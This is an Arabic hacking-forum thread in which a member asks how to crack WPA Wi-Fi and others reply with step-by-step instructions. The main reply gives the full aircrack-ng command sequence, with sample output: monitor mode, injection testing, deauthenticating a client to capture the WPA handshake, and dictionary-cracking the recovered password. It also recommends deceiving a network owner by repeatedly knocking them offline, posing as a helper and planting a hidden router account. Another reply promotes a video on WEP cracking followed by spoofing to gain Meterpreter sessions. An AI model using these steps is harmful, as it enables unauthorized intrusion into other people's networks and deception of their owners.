![]() |
يا اخ HaNGaw Kurd!$tanY هذا الشرح اللي اعطيتني لشبكات wep وليس wpa وبعدين انا عندي برنامج VM احمل من الموقع اي نسخة الايزو ولا الثانية |
[align=center]يا اخي حمل نسخة iso و هذ***1749; شرح لل اخ BlaCkHat کيف كيفية تنصيب الباك تراك 4 على النظام الوهمي virtual box http://www.vbspiders.com/vb/t33503.html#post286274 و بعدين أولا يجب معرفة اسم كرت النت وورك الهوائي الموجود عندك ولمعرفه ذلك تكتب في الشيل iwconfig اللي مكتوب بجنبه no wireless extensions. يعني مش كرت وايرلس اما المكتوب بجنبه مثل هالكلام كود: wlan0 IEEE 802.11bg ESSID:"" عندي اسمه wlan0 قد يكون عند الغير eth1 او حسب اسمه يكون هو الكرت .. قد نجد أكثر من واحد .. لأن الشخص ممكن يكون عنده أكثر من كرت بجهازه هو مركبهم .. ولمستخدمي اللابتوبات .. أكيد يوجد كرت هوائي .. ولمعرف اسمه نفعل مثل فوق الأن عرفنا اسم الكرت الهوائي .. أول شي نشغل الكرت على المونيتور .. يعني المراقبة airmon-ng start wlan0 قد يشتغل المونيتور ليس على نفس الإسم كود: root@bt:~# airmon-ng start wlan0 كما قال هنا أنه تم تفعيل المراقبة على اسم mon0 هنا كل واحد لازم يعرف وأنا سأكمل حسب الموجود عندي بعد هذا .. وأهم شيئ .. هو أن يكون الكرت عندك يدعم الحقن .. يعني يحقن باكيتس وهو ضروري جدا .. ولمعرف ذلك أكتب بعدين airodump-ng mon0 حتى نشوف الراوترات المحيطة بنا كود: CH 8 ][ Elapsed: 12 s ][ 2010-03-12 10:39 الأن كما نلاحظ أن نوع الحمايه هو wpa2 psk pre shared key يعني لازم يتم فصل مستخدم حتى نحصل على ملف الكاب لنكسره فيما بعد والمهم للكسر هو معرفة القناة CH .. channel اللي شغالة عليها الراوتر هنا هي القناة 1 كم نلاحظ تحت CH وأهم شي .. هو الماك أدريس للراوتر وللمستخدم الان نوقف المراقبة على أسماء الكروت .. (يمكننا أن نعمل مراقبة ,, لكن رح يطلع اسم كرت غير .. حست نوعية الكرت .. وهو هل حديث .. لأنه بهالحالة يقدم خصائص متميزة) المهم سأشرح الأسهل والموجود عند الجميع كود: airmon-ng stop mon0 هكذا نكون وقفنا المراقبة الأن نعيد تشغيلها لكن على القناة الخاصة بالراوتر اللي يجب أن نكسرهاوهي هنا رقم 1 كود: airmon-ng start wlan0 1 اخبرنا أن المراقبة شغالة على mon0 بعد هذا .. وأهم شيئ .. هو أن يكون الكرت عندك يدعم الحقن .. يعني يحقن باكيتس وهو ضروري جدا .. ولمعرف ذلك أكتب كود: aireplay-ng -9 -e ThomsonE2A46B -a 00:1F:9F:D3:1F:EB mon0 -9 لمعرفة إذا يدعم الحقن -e وبعدها اسم الراوتر -a وبعدها الماك ادريس للراوتر mon0 اسم الكرت اللي شغلنا المراقبة عليه نلاحظ شو يطلعلنا كود: 11:10:48 Waiting for beacon frame (BSSID: 00:1F:9F:D3:1F:EB) on channel 1 نلاحظ 11:10:48 Injection is working! 11:10:49 30/30: 100% يعني كل شي شغال وتمام ملاحظة .. يجب أن تكون قريب كفاية من الراوتر ..او عندك مقـوي اشارة الأن لمراقبة الراوتر ومستخدميها نكتب كود: airodump-ng -c 1 --bssid 00:1F:9F:D3:1F:EB -w ttt mon0 --bssid وبعدها الماك أدريس للراوتر -w وبعدها اسم الملف الذي سيخرج للحصول على شبك وهاند شيك mon0 اسم الكرت اللي تم عليه المراقبة نلاحظ كود: CH 1 ][ Elapsed: 1 min ][ 2010-03-12 10:50 handshake الأن للحصول على هاند شيك يجب فصل المستخدم على الراوتر فنستخدم هذا الأمرفي شاشة شيل تانية كود: aireplay-ng -0 1 -a 00:1F:9F:D3:1F:EB -c 00:13:CE:4F:B5:51 mon0 -0 لعمل deauthentication والرقم 1 هو يعني مرة واحدة .. اننا سنفصل مرة واحدة (ملاحظة .. يمكننا استخدام الهندسة الإجتماعية ان لم ننجح بمعرفة كلمة السر .. وهو ان نفصل حوالي مليون مرة .. ونقول لصاحب الشكبة اننا نعرف الحل ويمكننا المساعده .. لكن يجب معرفة كلمة السر والدخول للراوتر ومن هالحكي الكذب ههه هو يوثق فينا .. وعندها ندخل للراوتر .. نضيف مستخدم دخول مع كلمة سر خاصة به ونغير اللي بدنا اياه هههه .. طريقة نافعه .. ونجحت معي ) -a الماك أدريس للراوتر -c الماك أدريس للمستخدم اللي نريد فصله mon0 اسم الكرت اللي نراقب عليه .. نلاحظ شو يطلعلنا كود: root@bt:~# aireplay-ng -0 1 -a 00:1F:9F:D3:1F:EB -c 00:13:CE:4F:B5:51 mon0 بعد تطبيق الأمر .. نكون فصلنا مستخدم وقطعنا عنه الإتصال ثم عاد ودخل ونكون نحن حصلنا على ملف الكاب اللي فيه كلمة السر ويجب تخمينها .. كود: CH 1 ][ Elapsed: 6 mins ][ 2010-03-12 10:57 ][ WPA handshake: 00:1F:9F:D3:1F:EB نلاحظ على اليمين في الأعلى WPA handshake: 00:1F:9F:D3:1F:EB وهي مهمة .. وتعني أنه تم الفصل الأن حصلنا على ملف الكاب .. ويمكننا أنو نوقف المراقبة الأن يعني نوقف ال airodump-ng ما عدنا محتاجينها الأن جاء الدور المهم وهو تخمين كلمة السر(أقول تخمين لأن هذه الحماية بدها تخمين .. مش متل الويب نجمع باكيتس ونكسرهم) نستخدم الأن ونكتب كود: aircrack-ng -w passowrds.lst -b 00:1F:9F:D3:1F:EB tt*.cap -w بعدها مكان وجود ملف الباسووردات -b الماك أدريس للراوتر tt*.cap هو اسم ملف الكاب وهنا أعود وأذكر أنه نحن الأن نخمن كلمة السر من ملف فيه باسووردات كثيرة بمعنى أخر أنه يجب ان تكون كلمة السر موجودة داخل الملف حتى يتم اكتشافها .. وهنا تعتمد على مدى قوة وكبر ملف الباسووردات وسأنفذ الأمر عندي كود: aircrack-ng -w /pentest/passwords/wordlists/bt4-password.txt -b 00:1F:9F:D3:1F:EB tt*.cap ونلاحظ أنه تم معرفة كلمة السر كود: Aircrack-ng 1.0 r1668 alaa123123 إعادة سريعه ومختصرة 1- aireplay-ng -9 -e ThomsonE2A46B -a 00:1F:9F:D3:1F:EB mon0 لمعرفة هل يدعم الحقن 2- airodump-ng -c 1 --bssid 00:1F:9F:D3:1F:EB -w ttt mon0 لمراقبة الراوتر 3- aireplay-ng -0 1 -a 00:1F:9F:D3:1F:EB -c 00:13:CE:4F:B5:51 mon0 لفصل مستخدم 4- aircrack-ng -w passowrds.lst -b 00:1F:9F:D3:1F:EB tt*.cap لعمل تخمين وإيجاد كلمة السر .. وبالنهايةاذكر على انه يجب أن تكون كلمة السر موجودة بالملف وإلا لن يجدها لأننا هنا نعتمد على التخمين وليس الكسر وأرجو أن أكون قد وفقت [/align] |
[align=center]و اخي هذا شرح فيديو لل اخ m0j4h3d سأضع بين أيديكم شرح وتصوير فيديو عن كسر شبكة هوائية عليها حماية نوع ويب .. ثم الدخول إليها ثم اختراق من فيها عن طريق السبوف وأدواتها حتى الحصول على اتصال ميتر بريتر بمشروع الميتاسبلويت ,, والكل أصبح يعرف مبدأها وما يفرقها عن حماية الـ wpa .. ,, ثم اخترت طريقة السبوف باستخدام أدوات dnsiff لأنني سبق وأن شرحتها .. وان شاء الله في الأيام القادمة نشرح السبوف بواسطة الإيتير كاب .. وكل استخداماتها وأيضا الشرح تحت نظام لينوكس توزيعه باك تراك 4 .. لأنها تقريبا تحوي كل ما يحتاجه الهكر من برامج واللي يستخدم تويزيعه اخرى .. يمكنه تنزيل الأدوات واستخدامهم وتطبيق الأوامر طيب نبدأ بالموضوع .. هذا رابط الفيديو على استضافتي http://www.freewebtown.com/acount/lsn.rar أو من هنا http://www.4shared.com/file/GAfC3QTP/lsn.html ان كنت من مستخدمي ويندوز يجب عليك تحميل هذا البرنامج لمشاهدة الفيديو .. اكبس هنا للتحميل شكر لل اخ m0j4h3d [/align] |
بالتوفيق لك وشكرا للشرح اخي |
الساعة الآن 08:47 PM |
[ vBspiders.Com Network ]